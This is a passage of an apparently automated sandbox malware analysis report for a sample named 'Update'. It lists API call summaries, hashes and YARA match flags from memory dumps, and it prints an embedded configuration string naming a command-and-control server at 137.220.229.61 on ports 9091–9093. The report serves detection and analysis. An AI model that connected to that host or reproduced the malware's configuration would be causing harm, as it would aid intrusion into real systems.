                                                                                                • __RTC_Initialize.LIBCMT ref: 6CA9CE68
                                                                                                  • Part of subcall function 6CA9D21A: InitializeSListHead.KERNEL32(6CACCA10,6CA9CE72,6CAC9C08,00000010,6CA9D00B,?,00000000,?,00000007,6CAC9C28,00000010,6CA9D01E,?,?,6CA9D0A7,?), ref: 6CA9D21F
                                                                                                • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6CA9CED2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                                • String ID:
                                                                                                • API String ID: 3231365870-0
                                                                                                • Opcode ID: cdba4788a0b5aabed22b2d8ca7e7381935b36f57b938984c2f34df75a2c64064
                                                                                                • Instruction ID: db2de046066fa86b93e4c71601934b6dd90230db041d69525fb68e3a40ad7468
                                                                                                • Opcode Fuzzy Hash: cdba4788a0b5aabed22b2d8ca7e7381935b36f57b938984c2f34df75a2c64064
                                                                                                • Instruction Fuzzy Hash: C0213432B65B11AEDF04BFB89A067D833F1AB4676CF14881AD44267FC0DB3149CD8666
                                                                                                APIs
                                                                                                • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 037F3043
                                                                                                • recv.WS2_32(?,?,00040000,00000000), ref: 037F3064
                                                                                                  • Part of subcall function 037FF91B: __getptd_noexit.LIBCMT ref: 037FF91B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __getptd_noexitrecvselect
                                                                                                • String ID:
                                                                                                • API String ID: 4248608111-0
                                                                                                • Opcode ID: 5b3aa68193ca46dd8e4546b9c3db8d7cc0252bdb898be0c81be9287f556671ba
                                                                                                • Instruction ID: 812e1c47ea37f472b0f9a2aa9c490bd50d14f6e293d443ba36592d60585cd9e8
                                                                                                • Opcode Fuzzy Hash: 5b3aa68193ca46dd8e4546b9c3db8d7cc0252bdb898be0c81be9287f556671ba
                                                                                                • Instruction Fuzzy Hash: 9021827560030C9FEB20EF69DC88B9A77A5FF04350F1805A6E7549F390DB70A984CBA1
                                                                                                APIs
                                                                                                • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 10003023
                                                                                                • recv.WS2_32(?,?,00040000,00000000), ref: 10003044
                                                                                                  • Part of subcall function 1000710D: __getptd_noexit.LIBCMT ref: 1000710D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: __getptd_noexitrecvselect
                                                                                                • String ID:
                                                                                                • API String ID: 4248608111-0
                                                                                                • Opcode ID: 5f82ec4551d51fc2b9ede6d926e0403675d3e155566f9d28381eb2444e2c218b
                                                                                                • Instruction ID: 1cbb114b02e0d86a534962cf0a51f77a1151a50c8d60f66bd4e8238187776ab9
                                                                                                • Opcode Fuzzy Hash: 5f82ec4551d51fc2b9ede6d926e0403675d3e155566f9d28381eb2444e2c218b
                                                                                                • Instruction Fuzzy Hash: 7F21E770A01318EBFB11DF64DC95B9B73B8EF053D0F1081A5E5095B199DBB1AD84CBA1
                                                                                                APIs
                                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,6CAB1387,?,6CABA281,6CAB07FB,00000000,6CAB07FB,00000000), ref: 6CAB1A91
                                                                                                • GetLastError.KERNEL32(?,6CAB1387,?,6CABA281,6CAB07FB,00000000,6CAB07FB,00000000,00000000,?,6CABB0A5,00000000,00000000,6CABAFE2,6CAB07FB,00000000), ref: 6CAB1AB7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorFileLastWrite
                                                                                                • String ID:
                                                                                                • API String ID: 442123175-0
                                                                                                • Opcode ID: 07d90eab3bd74832f392434fb2d56337035fdbe494442a1a3bffa79e21357ee9
                                                                                                • Instruction ID: 3d3963da6b9352a7f1c1e9ffe410c787d1dcf2acd9a0c2f9ca2a89947540c252
                                                                                                • Opcode Fuzzy Hash: 07d90eab3bd74832f392434fb2d56337035fdbe494442a1a3bffa79e21357ee9
                                                                                                • Instruction Fuzzy Hash: 4D219431A0125D9FCB19CF1DC8809E9B7FAEB49305F1441AEEA05E7611D730EE86CB61
                                                                                                APIs
                                                                                                • SetFileAttributesA.KERNEL32(?,00000001,?,0000000A,00000000,?,00000022,00000040,00000001), ref: 6CA91124
                                                                                                • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CA9115F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: AttributesFileIos_base_dtorstd::ios_base::_
                                                                                                • String ID:
                                                                                                • API String ID: 2738015347-0
                                                                                                • Opcode ID: 145cb6ff982d24baa2a23ccb5f5d6acda2fbd03056a2082676a6a778792533e2
                                                                                                • Instruction ID: 3b8c41e2385760b1ed7bb70e458920d97036c7dee6aba4cb2d78bf6e36e61a7d
                                                                                                • Opcode Fuzzy Hash: 145cb6ff982d24baa2a23ccb5f5d6acda2fbd03056a2082676a6a778792533e2
                                                                                                • Instruction Fuzzy Hash: 25316D75611700DFE724CF28C945B96BBE9FB45724F108A1CE56A4B790C731F984CB81
                                                                                                APIs
                                                                                                • __RTC_Initialize.LIBCMT ref: 6CA9CF69
                                                                                                • ___scrt_uninitialize_crt.LIBCMT ref: 6CA9CF83
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: Initialize___scrt_uninitialize_crt
                                                                                                • String ID:
                                                                                                • API String ID: 2442719207-0
                                                                                                • Opcode ID: 1f5d6c40b50f37275f4db4ffa59128d1c32efacd445e12a6a10fcc04f325acc3
                                                                                                • Instruction ID: 41e4e27d60b886f68b10e1e98c89bef1ffdc90106ff77f521efb6f2399978c4e
                                                                                                • Opcode Fuzzy Hash: 1f5d6c40b50f37275f4db4ffa59128d1c32efacd445e12a6a10fcc04f325acc3
                                                                                                • Instruction Fuzzy Hash: 1521D473E38755ABCB04AFA896073DD77E0EB0575DF10801AD01296E80DB7486C9CB91
                                                                                                APIs
                                                                                                • send.WS2_32(?,?,00040000,00000000), ref: 037F3291
                                                                                                • send.WS2_32(?,?,?,00000000), ref: 037F32CE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: send
                                                                                                • String ID:
                                                                                                • API String ID: 2809346765-0
                                                                                                • Opcode ID: d14f33923bb404fb42ca06c4e0d0b1904254ac10be653c0710476940d431f022
                                                                                                • Instruction ID: e204f6628a3c7aba02e2eac3181478a7444e3aa05f27af01b6fcf4f1c3729453
                                                                                                • Opcode Fuzzy Hash: d14f33923bb404fb42ca06c4e0d0b1904254ac10be653c0710476940d431f022
                                                                                                • Instruction Fuzzy Hash: 8711E17AB01304AFE720CA6EDC88B5ABB9DFB81264F144166EB1CD7380D270D9818650
                                                                                                APIs
                                                                                                • SetFilePointerEx.KERNEL32(00000000,00000000,?,00008000,6CA8BBBA,00008000,6CAB07FB,?,?,?,6CAAFD04,6CAB07FB,?,00000000,6CA8BBBA,?), ref: 6CAAFEB8
                                                                                                • GetLastError.KERNEL32(00000000,?,?,?,6CAAFD04,6CAB07FB,?,00000000,6CA8BBBA,?,00000000,00008000,6CAB07FB,?,?,6CAB9C04), ref: 6CAAFEC5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorFileLastPointer
                                                                                                • String ID:
                                                                                                • API String ID: 2976181284-0
                                                                                                • Opcode ID: 2b0c82125e358540d497c9f967eb5ca43dcd9b58fe3be1224fb57eb0cb6c8e5b
                                                                                                • Instruction ID: f3237c8c4519a7acf3f0ef5431c48ba769ba87fd0b837d3c8ee722a76b6700fb
                                                                                                • Opcode Fuzzy Hash: 2b0c82125e358540d497c9f967eb5ca43dcd9b58fe3be1224fb57eb0cb6c8e5b
                                                                                                • Instruction Fuzzy Hash: 41012632614656AFCF1D8F99CC0988E3B79DF85324B280249F8119B691E671D992CB90
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: SleepTimetime
                                                                                                • String ID:
                                                                                                • API String ID: 346578373-0
                                                                                                • Opcode ID: cee107d3c32626b2edbf85d55d535b3f3beba51b964eb1f9e9a02c29628f604c
                                                                                                • Instruction ID: 518d66b8342ff05218431d0a5c9aa654122766544c597eada99e45bec308d2a6
                                                                                                • Opcode Fuzzy Hash: cee107d3c32626b2edbf85d55d535b3f3beba51b964eb1f9e9a02c29628f604c
                                                                                                • Instruction Fuzzy Hash: 9601F735204A05AFE311EF68C8C8B6DF7B9FB9A301F184264D2044B290D731A9C6C7D1
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: SleepTimetime
                                                                                                • String ID:
                                                                                                • API String ID: 346578373-0
                                                                                                • Opcode ID: 306b1d3a46dce6522edd8cfdaf26c6c38e0bc8121be3e04cf2ef1a2578d2637d
                                                                                                • Instruction ID: 27fac5dcdbeed923c3366fb10e8a319fa95706dbc2a1d72b4a6ad2049d896b26
                                                                                                • Opcode Fuzzy Hash: 306b1d3a46dce6522edd8cfdaf26c6c38e0bc8121be3e04cf2ef1a2578d2637d
                                                                                                • Instruction Fuzzy Hash: B501DF31A00206AFE302DF65C8C4BABB3F9FB99381F108624D1018B294C771ADD6C7E1
                                                                                                APIs
                                                                                                • HeapCreate.KERNEL32(00000004,00000000,00000000,037FE04E,00000000,037F9800,?,?,?,00000000,0381125B,000000FF,?,037FE04E), ref: 037FCD1B
                                                                                                • _free.LIBCMT ref: 037FCD56
                                                                                                  • Part of subcall function 037F1280: __CxxThrowException@8.LIBCMT ref: 037F1290
                                                                                                  • Part of subcall function 037F1280: DeleteCriticalSection.KERNEL32(00000000,037FD3E6,03816624,?,?,037FD3E6,?,?,?,?,03815A40,00000000), ref: 037F12A1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                                                                                                • String ID:
                                                                                                • API String ID: 1116298128-0
                                                                                                • Opcode ID: dd947b8632db1f28b052ecf124db9b28bf489f539e3209f6eb44e0368f952d65
                                                                                                • Instruction ID: 787869627df2182ba89514bf737d7935729bc256225482e779d5ead0b003eade
                                                                                                • Opcode Fuzzy Hash: dd947b8632db1f28b052ecf124db9b28bf489f539e3209f6eb44e0368f952d65
                                                                                                • Instruction Fuzzy Hash: B4017AB0A00B448FC331DF6A9844A0BFAF8BF98700B504A2ED2DAC6B10D374A105CF55
                                                                                                APIs
                                                                                                • HeapCreate.KERNEL32(00000004,00000000,00000000,?,00000000,10005AF2), ref: 1000642B
                                                                                                • _free.LIBCMT ref: 10006466
                                                                                                  • Part of subcall function 10001280: __CxxThrowException@8.LIBCMT ref: 10001290
                                                                                                  • Part of subcall function 10001280: DeleteCriticalSection.KERNEL32(00000000,?,10017E78), ref: 100012A1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                                                                                                • String ID:
                                                                                                • API String ID: 1116298128-0
                                                                                                • Opcode ID: a128095ffdd49348268c3586f1fd9261e0840fd0acd737389bb6af715d81e8f7
                                                                                                • Instruction ID: d75aab6d42964042dd9719b22c7254e4122bf8c787039a32894d973a0e8f9c7d
                                                                                                • Opcode Fuzzy Hash: a128095ffdd49348268c3586f1fd9261e0840fd0acd737389bb6af715d81e8f7
                                                                                                • Instruction Fuzzy Hash: D6017EF4A00B408FD321CF6A8884A47FAF9FF98750B104A1EE2DAC7A10D770A545CF55
                                                                                                APIs
                                                                                                • CreateThread.KERNEL32(00000000,00000000,037FDF10,00000000,00000000,00000000), ref: 037FE49B
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,03801168,?,?,?,?,?,?,03816298,0000000C,03801210,?), ref: 037FE4A9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateObjectSingleThreadWait
                                                                                                • String ID:
                                                                                                • API String ID: 1891408510-0
                                                                                                • Opcode ID: 148836afcfc040c4567257d69d60cdca3a6ac41e0a8966f3fd1331f9d594f10c
                                                                                                • Instruction ID: 32bcb716f44ca722e3053c3ed5f6d055495642fc84af0217fe3b49d3d20ac4bb
                                                                                                • Opcode Fuzzy Hash: 148836afcfc040c4567257d69d60cdca3a6ac41e0a8966f3fd1331f9d594f10c
                                                                                                • Instruction Fuzzy Hash: 0BE05BB0444A09BFDF20EF74AC88E3673DCE7147307204675BA24C2399D531A840C660
                                                                                                APIs
                                                                                                • __getptd.LIBCMT ref: 037FF98F
                                                                                                  • Part of subcall function 03803E5B: __getptd_noexit.LIBCMT ref: 03803E5E
                                                                                                  • Part of subcall function 03803E5B: __amsg_exit.LIBCMT ref: 03803E6B
                                                                                                  • Part of subcall function 037FF964: __getptd_noexit.LIBCMT ref: 037FF969
                                                                                                  • Part of subcall function 037FF964: __freeptd.LIBCMT ref: 037FF973
                                                                                                  • Part of subcall function 037FF964: ExitThread.KERNEL32 ref: 037FF97C
                                                                                                • __XcptFilter.LIBCMT ref: 037FF9B0
                                                                                                  • Part of subcall function 0380418F: __getptd_noexit.LIBCMT ref: 03804195
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                                                                                                • String ID:
                                                                                                • API String ID: 418257734-0
                                                                                                • Opcode ID: ec6894eb9f0cf7d55ce385f56ef3a23ffee9c45a6e64119e635b79e938a53361
                                                                                                • Instruction ID: bfd9b06e1f147cc7b00641f6065d3034b318cea2073a0da98fad31c65fc8ccdb
                                                                                                • Opcode Fuzzy Hash: ec6894eb9f0cf7d55ce385f56ef3a23ffee9c45a6e64119e635b79e938a53361
                                                                                                • Instruction Fuzzy Hash: DEE0ECB9940701EFDB18EBE5DC45E7D7779AF44601F210188E201AF2A1CB799941DE21
                                                                                                APIs
                                                                                                • __getptd.LIBCMT ref: 10007181
                                                                                                  • Part of subcall function 1000990F: __getptd_noexit.LIBCMT ref: 10009912
                                                                                                  • Part of subcall function 1000990F: __amsg_exit.LIBCMT ref: 1000991F
                                                                                                  • Part of subcall function 10007156: __getptd_noexit.LIBCMT ref: 1000715B
                                                                                                  • Part of subcall function 10007156: __freeptd.LIBCMT ref: 10007165
                                                                                                  • Part of subcall function 10007156: ExitThread.KERNEL32 ref: 1000716E
                                                                                                • __XcptFilter.LIBCMT ref: 100071A2
                                                                                                  • Part of subcall function 10009C41: __getptd_noexit.LIBCMT ref: 10009C47
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                                                                                                • String ID:
                                                                                                • API String ID: 418257734-0
                                                                                                • Opcode ID: 297936fcc0dbf5f526c0e08448a2f351abf61589ee907ea93caa2c8fedee672a
                                                                                                • Instruction ID: 91050fa4c4edb40f5b5d990f834f761f3b027d6385ed46559f27b3ea4901cb17
                                                                                                • Opcode Fuzzy Hash: 297936fcc0dbf5f526c0e08448a2f351abf61589ee907ea93caa2c8fedee672a
                                                                                                • Instruction Fuzzy Hash: 76E0ECB9904604DFF718DBA0C956E6E7775EF44241F210049F1015B2A6CB35B940DB24
                                                                                                APIs
                                                                                                • __lock.LIBCMT ref: 0380641B
                                                                                                  • Part of subcall function 03808E5B: __amsg_exit.LIBCMT ref: 03808E7D
                                                                                                  • Part of subcall function 03808E5B: EnterCriticalSection.KERNEL32(00000000,00000000,?,03803F06,0000000D,03816340,00000008,03803FFF,00000000,?,038010F0,00000000,03816278,00000008,03801155,?), ref: 03808E85
                                                                                                • __tzset_nolock.LIBCMT ref: 0380642C
                                                                                                  • Part of subcall function 03805D22: __lock.LIBCMT ref: 03805D44
                                                                                                  • Part of subcall function 03805D22: ____lc_codepage_func.LIBCMT ref: 03805D8B
                                                                                                  • Part of subcall function 03805D22: __getenv_helper_nolock.LIBCMT ref: 03805DAD
                                                                                                  • Part of subcall function 03805D22: _free.LIBCMT ref: 03805DE4
                                                                                                  • Part of subcall function 03805D22: _strlen.LIBCMT ref: 03805DEB
                                                                                                  • Part of subcall function 03805D22: __malloc_crt.LIBCMT ref: 03805DF2
                                                                                                  • Part of subcall function 03805D22: _strlen.LIBCMT ref: 03805E08
                                                                                                  • Part of subcall function 03805D22: _strcpy_s.LIBCMT ref: 03805E16
                                                                                                  • Part of subcall function 03805D22: __invoke_watson.LIBCMT ref: 03805E2B
                                                                                                  • Part of subcall function 03805D22: _free.LIBCMT ref: 03805E3A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__tzset_nolock_strcpy_s
                                                                                                • String ID:
                                                                                                • API String ID: 3577994687-0
                                                                                                • Opcode ID: d1905ef5ab3cd61402f4695766068c2e3deae4f257f39283e1a5916482d0d37b
                                                                                                • Instruction ID: 4d93759e993604adad575d84c506ffd625b2d6f959fcd17037eb093c1bb86828
                                                                                                • Opcode Fuzzy Hash: d1905ef5ab3cd61402f4695766068c2e3deae4f257f39283e1a5916482d0d37b
                                                                                                • Instruction Fuzzy Hash: A0E0CDB9C81F10D7C6F1FBF86D02A0C7220ABE0F31F5041D5D551DA4C4D6340251CA53
                                                                                                APIs
                                                                                                • lstrlenW.KERNEL32(|p1:137.220.229.61|o1:9091|t1:1|p2:137.220.229.61|o2:9092|t2:1|p3:137.220.229.61|o3:9093|t3:1|dd:1|cl:1|fz:), ref: 10004755
                                                                                                  • Part of subcall function 10003260: __wcsrev.LIBCMT ref: 10020655
                                                                                                Strings
                                                                                                • |p1:137.220.229.61|o1:9091|t1:1|p2:137.220.229.61|o2:9092|t2:1|p3:137.220.229.61|o3:9093|t3:1|dd:1|cl:1|fz:, xrefs: 10004750
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: __wcsrevlstrlen
                                                                                                • String ID: |p1:137.220.229.61|o1:9091|t1:1|p2:137.220.229.61|o2:9092|t2:1|p3:137.220.229.61|o3:9093|t3:1|dd:1|cl:1|fz:
                                                                                                • API String ID: 4062721203-133397238
                                                                                                • Opcode ID: ef503d5516fdfa215c481ae33ec846e637023be3d257a54ad483c27845c77df4
                                                                                                • Instruction ID: 3065bb4344b1789bcecd08ba6036c617636919b35652953f12b0e4d8e139a27a
                                                                                                • Opcode Fuzzy Hash: ef503d5516fdfa215c481ae33ec846e637023be3d257a54ad483c27845c77df4
                                                                                                • Instruction Fuzzy Hash: EFC08C72208214CFF202E3D4988876D7359EB33722F608039FA00CD012E672CC8097B1
                                                                                                APIs
                                                                                                • RegCloseKey.ADVAPI32(80000001,037F6E9A), ref: 037F6EC9
                                                                                                • RegCloseKey.ADVAPI32(75BF73E0), ref: 037F6ED2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Close
                                                                                                • String ID:
                                                                                                • API String ID: 3535843008-0
                                                                                                • Opcode ID: 297763f53ffc06b3f09c17544eef4313315b69f7d51b01d2aa6a5f5697ccda22
